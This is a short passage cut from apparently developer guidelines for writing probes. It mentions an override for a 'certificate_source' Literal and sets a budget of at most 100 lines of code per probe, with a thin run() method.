oncertificate_source'sLiteral), add the override.- LOC budget. ≤ 100 LOC per probe is the design discipline. If you find yourself over 120 LOC, the parser has too much logic — extract pure helpers and keep the
run()method thin (10–20 LOC).